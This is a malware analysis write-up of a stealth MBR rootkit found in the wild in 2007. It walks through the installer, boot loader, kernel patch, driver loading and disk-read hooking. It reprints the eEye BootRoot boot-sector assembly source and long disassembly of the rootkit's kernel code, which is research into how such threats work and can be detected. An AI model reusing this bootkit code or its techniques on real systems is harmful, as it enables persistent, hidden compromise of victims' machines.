Stealth MBR rootkit

Jan 2th, 2008

In 2005 Derek Soeder and Ryan Permeh, researchers from eEye Digital Security, presented eEye BootRoot. The technique used in their project wasn't new and had been popular in DOS times, but they first successfully used it in Windows NT Environment. The eEye Digital Security researchers skipped one part - BootRoot didn't hide the real content of affected sectors like old DOS Stealth MBR viruses, but it had only been created to show the possible way to compromise Windows NT OS.

Unfortunately, all the Windows NT family (including VISTA) still have the same security flaw - MBR can be modified from usermode. Nevertheless, MS blocked write-access to disk sectors from userland code on VISTA after the pagefile attack, however, the first sectors of disk are still unprotected !

Rootkit in the wild

At the end of 2007 stealth MBR rootkit was discovered by MR Team members (thanks to Tammy & MJ) and it looks like this way of affecting NT systems could be more common in near future if MBR stays unprotected.

"Good points" of being MBR rootkit:

  • full control of machine boot process-code is executed before the OS starts
  • rootkit does not need a file - code could exists in some sectors of the disk and it cannot be deleted as a usual file
  • rootkit does not need any registry entry because it is loaded by MBR code
  • to hide itself, rootkit needs to control only a few sectors of the disk
  • How MBR rootkit works :

  • Installer
  • MBR loader
  • Kernel patcher
  • Kernel driver loader
  • Sectors hider/protector
  • Kernel driver
  • Detection
  • Rootkit removal

  • Installer


    The installer of the rootkit writes the content of malicious kernel driver (244 736 bytes) to the last sectors of the disk (offset: 2 142 830 592) and then modifies sectors 0 (MBR), 60, 61 and 62.

    The content of hidden sectors:

  • 0 - MBR rootkit loader
  • 61 - kernel part of loader
  • 62 - copy of original MBR
  • Below, the "Process Monitor" log shows sectors modified by the rootkit installer:

    "39680","10:43:34,1365132","ldo2.tmp","848","CreateFile","\Device\Harddisk0\DR0","SUCCESS","Desired Access: Generic Read/Write, Disposition: Open, OpenResult: Opened"
    "39688","10:43:34,1419365","ldo2.tmp","848","DeviceIoControl","\Device\Harddisk0\DR0","FAST IO DISALLOWED","Control: IOCTL_DISK_GET_DRIVE_GEOMETRY"
    "39689","10:43:34,1419952","ldo2.tmp","848","DeviceIoControl","\Device\Harddisk0\DR0","SUCCESS","Control: IOCTL_DISK_GET_DRIVE_GEOMETRY"
    "39690","10:43:34,1424517","ldo2.tmp","848","ReadFile","\Device\Harddisk0\DR0","SUCCESS","Offset: 0, Length: 512, I/O Flags: Non-cached"
    
    "39769","10:43:34,2424965","ldo2.tmp","848","ReadFile","\Device\Harddisk0\DR0","SUCCESS","Offset: 2 142 830 592, Length: 512, I/O Flags: Non-cached"
    "39770","10:43:34,2492468","ldo2.tmp","848","ReadFile","\Device\Harddisk0\DR0","SUCCESS","Offset: 2 142 831 104, Length: 512, I/O Flags: Non-cached"
    "39771","10:43:34,2495318","ldo2.tmp","848","ReadFile","\Device\Harddisk0\DR0","SUCCESS","Offset: 2 142 831 616, Length: 512, I/O Flags: Non-cached"
    ...
    "40463","10:43:34,5546049","ldo2.tmp","848","ReadFile","\Device\Harddisk0\DR0","SUCCESS","Offset: 2 143 185 408, Length: 512, I/O Flags: Non-cached"
    
    "40679","10:43:34,7473241","ldo2.tmp","848","ReadFile","\Device\Harddisk0\DR0","SUCCESS","Offset: 30 720, Length: 512, I/O Flags: Non-cached"
    
    "40692","10:43:34,7854862","ldo2.tmp","848","ReadFile","\Device\Harddisk0\DR0","SUCCESS","Offset: 31 232, Length: 512, I/O Flags: Non-cached"
    
    "40705","10:43:34,7947558","ldo2.tmp","848","ReadFile","\Device\Harddisk0\DR0","SUCCESS","Offset: 31 744, Length: 512, I/O Flags: Non-cached"
    
    "40718","10:43:34,8035200","ldo2.tmp","848","WriteFile","\Device\Harddisk0\DR0","SUCCESS","Offset: 2 142 830 592, Length: 244 736, I/O Flags: Non-cached"
    "40719","10:43:34,8152900","ldo2.tmp","848","WriteFile","\Device\Harddisk0\DR0","SUCCESS","Offset: 30 720, Length: 512, I/O Flags: Non-cached"
    "40720","10:43:34,8252619","ldo2.tmp","848","WriteFile","\Device\Harddisk0\DR0","SUCCESS","Offset: 31 232, Length: 512, I/O Flags: Non-cached"
    "40721","10:43:34,8265515","ldo2.tmp","848","WriteFile","\Device\Harddisk0\DR0","SUCCESS","Offset: 31 744, Length: 512, I/O Flags: Non-cached"
    "40722","10:43:34,8277706","ldo2.tmp","848","WriteFile","\Device\Harddisk0\DR0","SUCCESS","Offset: 0, Length: 512, I/O Flags: Non-cached"
    
    
    "40729","10:43:34,8335180","ldo2.tmp","848","CloseFile","\Device\Harddisk0\DR0","SUCCESS",""
    

    MBR loader


    The Rootkit dropper overwrites original MBR code and stores a copy in sector 62. The author of rootkit mostly used MBR loader code developed by eEye researchers, however the original code has been modified to patch the Windows kernel instead of NDIS driver.

    rootkit MBR code

    original eEye MBR code

    ;===============================================================
    ; eEye BootRoot v0.90                  Last updated: 08/08/2005
    ;---------------------------------------------------------------
    ; Demonstration of the capabilities of custom boot sector code
    ; on a Windows NT-family system.
    ;
    ; Derek Soeder - eEye Digital Security - 04/02/2005
    ;===============================================================
    .486p
    .model tiny
    BOOTORG EQU 7C00h						; our code is executed by the BIOS at 0000h:7C00h
    BOOTROOT_SIZE EQU 200h
    BOOTROOT GROUP BRCODE16, BRDATA
    ASSUME CS:BOOTROOT, DS:BOOTROOT, ES:BOOTROOT, SS:BOOTROOT
    BRCODE16 SEGMENT byte use16
    @BRCODE16_START EQU $
    ;###################################
    ;##  Boot-Time Installation Code  ##
    ;###################################
    	;
    	; Initialization
    	;
    
    	cli
    	xor		bx, bx
    	mov		ss, bx
    	mov		ss:[BOOTORG - 2], sp
    	mov		sp, (BOOTORG - 2)
    	push		ds
    	pushad
    
    	mov		ds, bx
    	; Reserve 1KB conventional memory for our memory-resident code
    	dec		word ptr ds:[0413h]			; 0040h:0013h - base memory size in KBs
    	mov		ax, ds:[0413h]
    	shl		ax, (10-4)				; AX *= 1024 / 16 (convert linear address in KBs to a segment)
    
    	mov		es, ax
    	; Copy ourselves to reserved memory and initialize the rest to zeroes
    	cld
    	mov		si, BOOTORG
    	xor		di, di
    	mov		cx, BOOTROOT_SIZE / 2
    	rep movsw
    	xor		ax, ax
    	mov		ch, (1024 - BOOTROOT_SIZE) / 2 / 100h
    	rep stosw
    
     
    	; Install our INT 13h hook
    	mov		eax, ds:[bx + (13h*4)]
    	mov		es:[INT13HANDLER - @BRCODE16_START], eax	; store previous handler
    	mov		word ptr [bx + (13h*4)], @Int13Hook	; point INT 13h vector to our hook handler
    	mov		[bx + (13h*4) + 2], es			; (BX = 0 from earlier)
    	; Load and execute MBR from first hard drive (do this from resident code)
    	push		es
    	push		@BootFromHDD
    	retf
    @BootFromHDD:
    	sti
    	mov		es, cx					; CX = 0 from above REP STOSW
    	mov		ax, 0201h				; AL = number of sectors
    	inc		cx					; CH = cylinder; CL = sector and high bits of cylinder
    	mov		dx, 0080h				; DH = head; DL = drive number
    	mov		bh, (BOOTORG / 100h)			; ES:BX -> destination buffer
    	int		13h					; INT 13h/AH=02h: Read sector(s) into memory
    	popad
    	pop		ds
    	pop		sp
    	db		0EAh					; JMP FAR 0000h:7C00h
    	dw		BOOTORG, 0000h
    
    
    
    ;##################################
    ;##  INT 13h Hook Real-Mode ISR  ##
    ;##################################
    @Int13Hook:
    	pushf
    	cmp		ah, 42h					; IBM/MS INT 13 Extensions - EXTENDED READ
    	je		short @Int13Hook_ReadRequest
    	cmp		ah, 02h					; DISK - READ SECTOR(S) INTO MEMORY
    	je		short @Int13Hook_ReadRequest
    	popf
    	db		0EAh					; JMP FAR INT13HANDLER
    INT13HANDLER EQU $
    	dd		?
    @Int13Hook_ReadRequest:
    	mov		byte ptr cs:[INT13LASTFUNCTION], ah
    	; Invoke original handler to perform read operation
    	popf
    	pushf							; push Flags because we're simulating an INT
    	call		dword ptr cs:[INT13HANDLER]		; call original handler
    	jc		short @Int13Hook_ret			; abort immediately if read failed
    	pushf
    	cli
    	push		es
    	pusha
    	mov		ah, 00h
    INT13LASTFUNCTION EQU $-1
    	cmp		ah, 42h
    	jne		short @Int13Hook_notextread
    	lodsw
    	lodsw							; +02h  WORD    number of blocks to transfer
    	les		bx, [si]				; +04h  DWORD   transfer buffer
    @Int13Hook_notextread:
    	; Scan sector for a signature of the code we want to modify
    	test		al, al
    	jle		short @Int13Hook_scan_done
    	cld
    	mov		cl, al
    	mov		al, 8Bh
    	shl		cx, 9					; (AL * 200h)
    	mov		di, bx
      @Int13Hook_scan_loop:
    								; 8B F0       MOV ESI, EAX
    								; 85 F6       TEST ESI, ESI
    								; 74 21       JZ $+23h
    								; 80 3D ...   CMP BYTE PTR [ofs32], imm8
    								; (the first 6 bytes of this signature exist in other modules!)
    	repne scasb
    	jne		short @Int13Hook_scan_done
    	cmp		dword ptr es:[di], 74F685F0h
    	jne		short @Int13Hook_scan_loop
    	cmp		word ptr es:[di+4], 8021h
    	jne		short @Int13Hook_scan_loop
    	mov		word ptr es:[di-1], 15FFh		; FFh/15h/xx/xx/xx/xx: CALL NEAR [ofs32]
    	mov		eax, cs
    	shl		eax, 4
    	add		cs:[(NDISBACKDOOR_LINEAR - @BRPATCHFUNC32_START) + BRCODE16_SIZE], eax
    	add		ax, (@PatchFunction - @BRPATCHFUNC32_START) + BRCODE16_SIZE
    	mov		cs:[PATCHFUNC32_LINEAR], eax		; should be okay to add to AX, since we can't cross 1KB boundary
    	add		ax, PATCHFUNC32_LINEAR - ((@PatchFunction - @BRPATCHFUNC32_START) + BRCODE16_SIZE)
    	mov		es:[di+1], eax
    @Int13Hook_scan_done:
    	popa
    	pop		es
    	popf
    @Int13Hook_ret:
    	retf 2							; discard saved Flags from original INT (pass back CF, etc.)
    
    @BRCODE16_END EQU $
    BRCODE16_SIZE EQU (@BRCODE16_END - @BRCODE16_START)
    BRCODE16 ENDS
    

    Kernel patcher


    MBR rootkit loader hooks INT 0x13 to control content of sectors loaded by NTLDR. It patches two areas of the kernel: the first contains the call of nt!IoInitSystem function and the second is the last page of the kernel image. At the beginning of start-up rootkit calls original nt!IoInitSystem function and then loads its own driver.

    start    end        module name
    804d7000 806ebc80   nt         
    806ebe00 806ebfff   rootkit code
    806ec000 806ffd80   hal        
    

    Patched kernel code

    Original kernel code

    806a0a79 0f85d9dcffff     jne     nt!Phase1Initialization+0x942 (8069e758)
    806a0a7f e8f9650100       call    nt!ExInitSystemPhase2 (806b707d)
    806a0a84 6a19             push    0x19
    806a0a86 e83af1e6ff       call    nt!InbvUpdateProgressBar (8050fbc5)
    806a0a8b ffb590fbffff     push    dword ptr [ebp-0x470]
    806a0a91 891d78cb5480     mov     [nt!KdpTimeSlipPending (8054cb78)],ebx
    806a0a97 e8cef30000       call    nt!XIPInit (806afe6a)
    806a0a9c 6a4b             push    0x4b
    806a0a9e 6a19             push    0x19
    806a0aa0 e83cf1e6ff       call    nt!InbvSetProgressBarSubset (8050fbe1)
    806a0aa5 ffb590fbffff     push    dword ptr [ebp-0x470]
    
    806a0aab e850b30400       call    806ebe00
    
    806a0ab0 84c0             test    al,al
    806a0ab2 0f84e7dcffff     je      nt!Phase1Initialization+0x9b9 (8069e79f)
    806a0ab8 6a64             push    0x64
    806a0aba 53               push    ebx
    806a0abb e821f1e6ff       call    nt!InbvSetProgressBarSubset (8050fbe1)
    806a0ac0 391d007f5580     cmp     [nt!InitSafeBootMode (80557f00)],ebx
    806a0ac6 be3f000f00       mov     esi,0xf003f
    806a0acb 0f85d5dcffff     jne     nt!Phase1Initialization+0x9d9 (8069e7a6)
    806a0ad1 381d142b5580     cmp     [nt!InitIsWinPEMode (80552b14)],bl
    806a0ad7 0f8563deffff     jne     nt!Phase1Initialization+0xb76 (8069e940)
    806a0add 8bb590fbffff     mov     esi,[ebp-0x470]
    806a0ae3 56               push    esi
    806a0ae4 6a02             push    0x2
    806a0ae6 e82c020000       call    nt!MmInitSystem (806a0d17)
    806a0aeb 6a50             push    0x50
    806a0aed e8d3f0e6ff       call    nt!InbvUpdateProgressBar (8050fbc5)
    806a0af2 e8fb070000       call    nt!KeI386VdmInitialize (806a12f2)
    806a0af7 e8f11e0000       call    nt!KiLogMcaErrors (806a29ed)
    806a0afc 6a01             push    0x1
    806a0afe e85cf1ffff       call    nt!PoInitSystem (8069fc5f)
    806a0b03 84c0             test    al,al
    806a0b05 0f8419daffff     je      nt!Phase1Initialization+0x259 (8069e524)
    806a0b0b 56               push    esi
    
    806a0a79 0f85d9dcffff     jne     nt!Phase1Initialization+0x942 (8069e758)
    806a0a7f e8f9650100       call    nt!ExInitSystemPhase2 (806b707d)
    806a0a84 6a19             push    0x19
    806a0a86 e83af1e6ff       call    nt!InbvUpdateProgressBar (8050fbc5)
    806a0a8b ffb590fbffff     push    dword ptr [ebp-0x470]
    806a0a91 891d78cb5480     mov     [nt!KdpTimeSlipPending (8054cb78)],ebx
    806a0a97 e8cef30000       call    nt!XIPInit (806afe6a)
    806a0a9c 6a4b             push    0x4b
    806a0a9e 6a19             push    0x19
    806a0aa0 e83cf1e6ff       call    nt!InbvSetProgressBarSubset (8050fbe1)
    806a0aa5 ffb590fbffff     push    dword ptr [ebp-0x470]
    
    806a0aab e844e6ffff       call    nt!IoInitSystem (8069f0f4)
    
    806a0ab0 84c0             test    al,al
    806a0ab2 0f84e7dcffff     je      nt!Phase1Initialization+0x9b9 (8069e79f)
    806a0ab8 6a64             push    0x64
    806a0aba 53               push    ebx
    806a0abb e821f1e6ff       call    nt!InbvSetProgressBarSubset (8050fbe1)
    806a0ac0 391d007f5580     cmp     [nt!InitSafeBootMode (80557f00)],ebx
    806a0ac6 be3f000f00       mov     esi,0xf003f
    806a0acb 0f85d5dcffff     jne     nt!Phase1Initialization+0x9d9 (8069e7a6)
    806a0ad1 381d142b5580     cmp     [nt!InitIsWinPEMode (80552b14)],bl
    806a0ad7 0f8563deffff     jne     nt!Phase1Initialization+0xb76 (8069e940)
    806a0add 8bb590fbffff     mov     esi,[ebp-0x470]
    806a0ae3 56               push    esi
    806a0ae4 6a02             push    0x2
    806a0ae6 e82c020000       call    nt!MmInitSystem (806a0d17)
    806a0aeb 6a50             push    0x50
    806a0aed e8d3f0e6ff       call    nt!InbvUpdateProgressBar (8050fbc5)
    806a0af2 e8fb070000       call    nt!KeI386VdmInitialize (806a12f2)
    806a0af7 e8f11e0000       call    nt!KiLogMcaErrors (806a29ed)
    806a0afc 6a01             push    0x1
    806a0afe e85cf1ffff       call    nt!PoInitSystem (8069fc5f)
    806a0b03 84c0             test    al,al
    806a0b05 0f8419daffff     je      nt!Phase1Initialization+0x259 (8069e524)
    806a0b0b 56               push    esi
    
    806ebd60 85 0c fe f8 ff 83 f8 10 0f 82 de fd f8 ff 83 7e  ...............~
    806ebd70 0c 00 0f 85 f9 fd f8 ff e9 cf fd f8 ff e9 eb fd  ................
    806ebd80 f8 ff 8b cf e8 07 64 ef ff e9 ed fd f8 ff 80 7d  ......d........}
    806ebd90 ff 00 0f 84 f0 fd f8 ff 8b 45 08 8b 40 0c 85 c0  .........E..@...
    806ebda0 0f 84 ee 88 fa ff 8b 40 08 85 c0 0f 84 e3 88 fa  .......@........
    806ebdb0 ff 6a 01 50 e8 8c 0d f0 ff e9 d6 88 fa ff ff 75  .j.P...........u
    806ebdc0 f8 8d 85 cc fe ff ff 50 e8 36 a3 f4 ff e9 c8 fd  .......P.6......
    806ebdd0 f8 ff 64 a1 24 01 00 00 ff 80 d4 00 00 00 0f 85  ..d.$...........
    806ebde0 cc fd f8 ff 8d 48 34 39 09 0f 84 c1 fd f8 ff b1  .....H49........
    806ebdf0 01 c6 40 49 01 ff 15 54 06 40 00 e9 b0 fd f8 ff  ..@I...T.@......
    806ebe00 8b 14 24 68 f4 f0 69 80 8b 0c 24 68 00 70 4d 80  ..$h..i...$h.pM.  <--- hooked nt!IoInitSystem
    806ebe10 0f 20 c0 50 25 ff ff fe ff 0f 22 c0 2b ca 58 0f  . .P%.....".+.X.
    806ebe20 22 c0 ff 34 24 68 62 e0 07 37 e8 3b 00 00 00 59  "..4$hb..7.;...Y
    806ebe30 59 68 ab 01 00 00 6a 00 ff d0 60 e8 00 00 00 00  Yh....j...`.....
    806ebe40 5e 83 c6 15 8b f8 6a 6a 59 f3 a5 b1 80 8d be 00  ^.....jjY.......
    806ebe50 fe ff ff ff e0 33 c0 61 ff 74 24 0c ff 54 24 08  .....3.a.t$..T$.
    806ebe60 59 5a 60 87 cd e8 52 00 00 00 60 8b 6c 24 28 8b  YZ`...R...`.l$(.
    806ebe70 45 3c 8b 54 05 78 03 d5 8b 4a 18 8b 5a 20 03 dd  E<.T.x...J..Z ..
    806ebe80 e3 32 49 8b 34 8b 03 f5 33 ff fc 33 c0 ac 3a c4  .2I.4...3..3..:.
    806ebe90 74 07 c1 cf 0d 03 f8 eb f2 3b 7c 24 24 75 e1 8b  t........;|$$u..
    806ebea0 5a 24 03 dd 66 8b 0c 4b 8b 5a 1c 03 dd 8b 04 8b  Z$..f..K.Z......
    806ebeb0 03 c5 eb 02 33 c0 89 44 24 1c 61 c3 5b 55 68 b8  ....3..D$.a.[Uh.
    806ebec0 74 29 85 ff d3 33 d2 52 52 8b f4 52 8b fc e8 26  t)...3.RR..R...&
    806ebed0 00 00 00 5c 00 3f 00 3f 00 5c 00 50 00 68 00 79  ...\.?.?.\.P.h.y
    806ebee0 00 73 00 69 00 63 00 61 00 6c 00 44 00 72 00 69  .s.i.c.a.l.D.r.i
    806ebef0 00 76 00 65 00 30 00 00 00 68 24 00 26 00 8b cc  .v.e.0...h$.&...
    806ebf00 52 52 6a 40 51 52 6a 18 8b cc 6a 20 6a 03 56 51  RRj@QRj...j j.VQ
    806ebf10 68 00 00 10 80 57 ff d0 55 68 62 e0 07 37 ff d3  h....W..Uhb..7..
    806ebf20 97 55 68 16 d5 fc 84 ff d3 89 06 68 00 00 00 00  .Uh........h....
    806ebf30 68 00 00 b9 7f 8b cc 6a 00 51 b9 00 bc 03 00 51  h......j.Q.....Q
    806ebf40 51 6a 00 ff d7 50 56 8b ce 96 33 d2 52 52 52 ff  Qj...PV...3.RRR.
    806ebf50 74 24 58 ff 11 55 68 5f 4c d4 dc ff d3 ff 74 24  t$X..Uh_L.....t$
    806ebf60 40 ff d0 8b 46 3c 03 c6 50 8b 50 50 52 52 6a 00  @...F<..P.PPRRj.
    806ebf70 ff d7 97 59 57 32 c0 f3 aa 5f 58 60 8b 48 54 f3  ...YW2..._X`.HT.
    806ebf80 a4 61 2b c6 03 c7 0f b7 48 06 8d 90 f8 00 00 00  .a+.....H.......
    806ebf90 60 03 72 14 03 7a 0c 8b 4a 10 e3 02 f3 a4 61 83  `.r..z..J.....a.
    806ebfa0 c2 28 e2 ec 50 60 8b fe 91 b9 00 ef 00 00 f3 ab  .(..P`..........
    806ebfb0 61 55 68 1f 9d 48 9d ff d3 95 56 ff d5 8b 74 24  aUh..H....V...t$
    806ebfc0 08 ff b4 24 84 00 00 00 57 8b 46 28 03 c7 ff d0  ...$....W.F(....
    806ebfd0 0b c0 7d 0e 8b 4e 50 e3 09 32 c0 57 f3 aa 5f 57  ..}..NP..2.W.._W
    806ebfe0 ff d5 83 c4 60 33 c0 8b fb 83 ef 15 b9 9c 01 00  ....`3..........
    806ebff0 00 f3 aa 61 c2 04 00 00 00 00 00 00 00 00 00 00  ...a............
    806ec000 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00  MZ..............  <--- 806ec000 806ffd80 hal
    806ec010 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00  ........@.......
    806ec020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
    806ec030 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00  ................
    806ec040 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68  ........!..L.!Th
    806ec050 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f  is program canno
    806ec060 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20  t be run in DOS 
    806ec070 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00  mode....$.......
    
    806ebe00 8b1424           mov     edx,[esp]
    806ebe03 68f4f06980       push    0x8069f0f4
    806ebe08 8b0c24           mov     ecx,[esp]
    806ebe0b 6800704d80       push    0x804d7000
    806ebe10 0f20c0           mov     eax,cr0
    806ebe13 50               push    eax
    806ebe14 25fffffeff       and     eax,0xfffeffff
    806ebe19 0f22c0           mov     cr0,eax			; disable code write protection
    806ebe1c 2bca             sub     ecx,edx
    806ebe1e 58               pop     eax
    806ebe1f 0f22c0           mov     cr0,eax
    806ebe22 ff3424           push    dword ptr [esp]
    806ebe25 6862e00737       push    0x3707e062
    806ebe2a e83b000000       call    806ebe6a
    806ebe2f 59               pop     ecx
    806ebe30 59               pop     ecx
    806ebe31 68ab010000       push    0x1ab
    806ebe36 6a00             push    0x0
    806ebe38 ffd0             call    eax {nt!ExAllocatePool (8050fd66)}
    806ebe3a 60               pushad
    806ebe3b e800000000       call    806ebe40
    806ebe40 5e               pop     esi
    806ebe41 83c615           add     esi,0x15
    806ebe44 8bf8             mov     edi,eax
    806ebe46 6a6a             push    0x6a
    806ebe48 59               pop     ecx
    806ebe49 f3a5             rep     movsd
    806ebe4b b180             mov     cl,0x80
    806ebe4d 8dbe00feffff     lea     edi,[esi-0x200]
    806ebe53 ffe0             jmp     eax {81bf06d0}
    
    81bf06d0 33c0             xor     eax,eax
    81bf06d2 61               popad
    81bf06d3 ff74240c         push    dword ptr [esp+0xc]
    81bf06d7 ff542408         call dword ptr [esp+0x8]{nt!IoInitSystem (8069f0f4)} ss:0010:f9e6383c=8069f0f4
    81bf06db 59               pop     ecx
    81bf06dc 5a               pop     edx
    81bf06dd 60               pushad
    81bf06de 87cd             xchg    ebp,ecx
    81bf06e0 e852000000       call    81bf0737
    81bf06e5 60               pushad
    81bf06e6 8b6c2428         mov     ebp,[esp+0x28]
    81bf06ea 8b453c           mov     eax,[ebp+0x3c]
    81bf06ed 8b540578         mov     edx,[ebp+eax+0x78]
    81bf06f1 03d5             add     edx,ebp
    81bf06f3 8b4a18           mov     ecx,[edx+0x18]
    81bf06f6 8b5a20           mov     ebx,[edx+0x20]
    81bf06f9 03dd             add     ebx,ebp
    81bf06fb e332             jecxz   81bf072f
    81bf06fd 49               dec     ecx
    81bf06fe 8b348b           mov     esi,[ebx+ecx*4]
    81bf0701 03f5             add     esi,ebp
    81bf0703 33ff             xor     edi,edi
    81bf0705 fc               cld
    81bf0706 33c0             xor     eax,eax
    81bf0708 ac               lodsb
    81bf0709 3ac4             cmp     al,ah
    81bf070b 7407             jz      81bf0714
    81bf070d c1cf0d           ror     edi,0xd
    81bf0710 03f8             add     edi,eax
    81bf0712 ebf2             jmp     81bf0706
    81bf0714 3b7c2424         cmp     edi,[esp+0x24]
    81bf0718 75e1             jnz     81bf06fb
    81bf071a 8b5a24           mov     ebx,[edx+0x24]
    81bf071d 03dd             add     ebx,ebp
    81bf071f 668b0c4b         mov     cx,[ebx+ecx*2]
    81bf0723 8b5a1c           mov     ebx,[edx+0x1c]
    81bf0726 03dd             add     ebx,ebp
    81bf0728 8b048b           mov     eax,[ebx+ecx*4]
    81bf072b 03c5             add     eax,ebp
    81bf072d eb02             jmp     81bf0731
    81bf072f 33c0             xor     eax,eax
    81bf0731 8944241c         mov     [esp+0x1c],eax
    81bf0735 61               popad
    81bf0736 c3               ret
    

    Kernel driver loader


    The main part of rootkit loader opens "\??\PhysicalDrive0" and reads the content of the malicious kernel driver from the disk. Rootkit uses its own procedure to load image sections to the memory and in the last stage the loader calls driver's entry point.
    81bf077f 51               push    ecx
    81bf0780 52               push    edx
    81bf0781 6a18             push    0x18
    81bf0783 8bcc             mov     ecx,esp
    81bf0785 6a20             push    0x20
    81bf0787 6a03             push    0x3
    81bf0789 56               push    esi
    81bf078a 51               push    ecx
    81bf078b 6800001080       push    0x80100000
    81bf0790 57               push    edi
    
    kd> r
    eax=805715e7 ebx=81bf06e5 ecx=f9e637ec edx=00000000 esi=f9e63810 edi=f9e6380c
    
    kd> dt -r nt!_OBJECT_ATTRIBUTES f9e637ec
       +0x000 Length           : 0x18
       +0x004 RootDirectory    : (null) 
       +0x008 ObjectName       : 0xf9e63804  "\??\PhysicalDrive0"
          +0x000 Length           : 0x24
          +0x002 MaximumLength    : 0x26
          +0x004 Buffer           : 0x81bf074e  "\??\PhysicalDrive0"
       +0x00c Attributes       : 0x40
       +0x010 SecurityDescriptor : (null) 
       +0x014 SecurityQualityOfService : (null) 
    
    81bf0791 ffd0             call    eax {nt!NtOpenFile (805715e7)}
    81bf0793 55               push    ebp
    81bf0794 6862e00737       push    0x3707e062
    81bf0799 ffd3             call    ebx {81bf06e5}
    81bf079b 97               xchg    eax,edi
    81bf079c 55               push    ebp
    81bf079d 6816d5fc84       push    0x84fcd516
    81bf07a2 ffd3             call    ebx {81bf06e5}
    81bf07a4 8906             mov     [esi],eax
    81bf07a6 6800000000       push    0x0
    81bf07ab 680000b97f       push    0x7fb90000	; offset of the first sector = 2 142 830 592
    81bf07b0 8bcc             mov     ecx,esp
    81bf07b2 6a00             push    0x0
    81bf07b4 51               push    ecx
    81bf07b5 b900bc0300       mov     ecx,0x3bc00
    81bf07ba 51               push    ecx
    81bf07bb 51               push    ecx
    81bf07bc 6a00             push    0x0
    81bf07be ffd7             call    edi {nt!ExAllocatePool (8050fd66)}
    81bf07c0 50               push    eax
    81bf07c1 56               push    esi
    81bf07c2 8bce             mov     ecx,esi
    81bf07c4 96               xchg    eax,esi
    81bf07c5 33d2             xor     edx,edx
    81bf07c7 52               push    edx
    81bf07c8 52               push    edx
    81bf07c9 52               push    edx
    81bf07ca ff742458         push    dword ptr [esp+0x58]
    81bf07ce ff11             call dword ptr [ecx]{nt!NtReadFile (80571b30)} ds:0023:f9e63810=80571b30
    81bf07d0 55               push    ebp
    81bf07d1 685f4cd4dc       push    0xdcd44c5f
    81bf07d6 ffd3             call    ebx {81bf06e5}
    81bf07d8 ff742440         push    dword ptr [esp+0x40]
    81bf07dc ffd0             call    eax {nt!NtClose (805675d9)}
    81bf07de 8b463c           mov     eax,[esi+0x3c]
    81bf07e1 03c6             add     eax,esi
    81bf07e3 50               push    eax
    81bf07e4 8b5050           mov     edx,[eax+0x50]
    81bf07e7 52               push    edx
    81bf07e8 52               push    edx
    81bf07e9 6a00             push    0x0
    81bf07eb ffd7             call    edi {nt!ExAllocatePool (8050fd66)}
    81bf07ed 97               xchg    eax,edi
    81bf07ee 59               pop     ecx
    81bf07ef 57               push    edi
    81bf07f0 32c0             xor     al,al
    81bf07f2 f3aa             rep     stosb
    81bf07f4 5f               pop     edi
    81bf07f5 58               pop     eax
    81bf07f6 60               pushad
    81bf07f7 8b4854           mov     ecx,[eax+0x54]
    81bf07fa f3a4             rep     movsb
    81bf07fc 61               popad
    81bf07fd 2bc6             sub     eax,esi
    81bf07ff 03c7             add     eax,edi
    81bf0801 0fb74806         movzx   ecx,word ptr [eax+0x6]
    81bf0805 8d90f8000000     lea     edx,[eax+0xf8]
    81bf080b 60               pushad
    81bf080c 037214           add     esi,[edx+0x14]
    81bf080f 037a0c           add     edi,[edx+0xc]
    81bf0812 8b4a10           mov     ecx,[edx+0x10]
    81bf0815 e302             jecxz   81bf0819
    81bf0817 f3a4             rep     movsb
    81bf0819 61               popad
    81bf081a 83c228           add     edx,0x28
    81bf081d e2ec             loop    81bf080b
    81bf081f 50               push    eax
    81bf0820 60               pushad
    81bf0821 8bfe             mov     edi,esi
    81bf0823 91               xchg    eax,ecx
    81bf0824 b900ef0000       mov     ecx,0xef00
    81bf0829 f3ab             rep     stosd
    81bf082b 61               popad
    81bf082c 55               push    ebp
    81bf082d 681f9d489d       push    0x9d489d1f
    81bf0832 ffd3             call    ebx {81bf06e5}
    81bf0834 95               xchg    eax,ebp
    81bf0835 56               push    esi
    81bf0836 ffd5             call    ebp {nt!ExFreePool (8054b7aa)}
    81bf0838 8b742408         mov     esi,[esp+0x8]
    81bf083c ffb42484000000   push    dword ptr [esp+0x84]
    81bf0843 57               push    edi
    81bf0844 8b4628           mov     eax,[esi+0x28]
    81bf0847 03c7             add     eax,edi
    81bf0849 ffd0             call    eax {81951946}    <--- driver's entry point 
    81bf084b 0bc0             or      eax,eax
    81bf084d 7d0e             jge     81bf085d
    81bf084f 8b4e50           mov     ecx,[esi+0x50]
    81bf0852 e309             jecxz   81bf085d
    81bf0854 32c0             xor     al,al
    81bf0856 57               push    edi
    81bf0857 f3aa             rep     stosb
    81bf0859 5f               pop     edi
    81bf085a 57               push    edi
    81bf085b ffd5             call    ebp
    81bf085d 83c460           add     esp,0x60
    81bf0860 33c0             xor     eax,eax
    81bf0862 8bfb             mov     edi,ebx
    81bf0864 83ef15           sub     edi,0x15
    81bf0867 b99c010000       mov     ecx,0x19c
    81bf086c f3aa             rep     stosb                        
    81bf086e 61               popad
    81bf086f c20400           ret     0x4
    

    Sectors hider/protector


    To hide the real content of MBR and other sectors from AV scanners rootkit hooks "\Driver\Disk" IRP_MJ_READ. Normally, when API reads sector 0 (MBR), rootkit modifies disk IRP_MJ_READ call and returns copy of original MBR stored in sector 62. The second hook (IRP_MJ_WRITE) protects it from being deleted/overwritten.

    ---- Devices - GMER 1.0.13 ----
    
    Device  \Driver\Disk \Device\Harddisk0\DR0 IRP_MJ_READ   81831410
    Device  \Driver\Disk \Device\Harddisk0\DR0 IRP_MJ_WRITE  81831410
    
    ---- Threads - GMER 1.0.13 ----
    
    Thread  4:2032                                           81837EE8
    Thread  4:2036                                           81830E44
    Thread  4:2040                                           81836496
    Thread  4:120                                            81867A90
    Thread  4:1716                                           818552E0
    Thread  4:124                                            8189B9D0
    Thread  4:160                                            81841540
    Thread  4:232                                            818362A0
    
    ---- EOF - GMER 1.0.13 ----
    
    kd> dt -r _DEVICE_OBJECT 81be1ab8
       +0x000 Type             : 3
